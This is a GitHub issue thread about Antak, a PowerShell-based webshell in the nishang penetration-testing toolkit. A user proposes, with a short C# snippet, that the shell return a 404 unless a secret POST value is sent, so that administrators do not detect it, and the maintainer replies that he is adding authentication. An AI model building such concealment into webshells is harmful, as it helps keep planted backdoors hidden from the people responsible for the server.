### ISSUE TITLE
Antak Stealth Request

### ISSUE THREAD

**Issue by connection** [samratashok/nishang#17]
Would it be a possible to incorporate a check for a POST variable matching a certain string and otherwise serve up a 404 error? Something similar to the following

```
<%--Antak - A Webshell which utilizes powershell.--%>

<script Language="c#" runat="server">
if (Request.Form["language"] != "whatever")
{
    context.Response.StatusCode = 404;
    context.Response.End();
    return;
}
else

{
 ...rest of code...
}
```

**Comment by samratashok** [comment]
Interesting suggestion! What if I implement authentication in place of this? Wouldn't that be better/easier to use?

**Comment by connection** [comment]
Authentication would be nice as well, I was just thinking that it'd be nice to first check for the existence of the POST variable to keep snooping admins from thinking there is anything at the requested location unless they actually view the file on the server itself.

**Comment by samratashok** [comment]
Noted! I would try and see what could be done. Authentication would be implemented as well.

**Comment by samratashok** [comment]
Some changes to Antak have been made. Will commit the changes after an upcoming preso at Blackhat.

**Comment by samratashok** [comment]
Authentication is required to access Antak. That is all to be added for now.
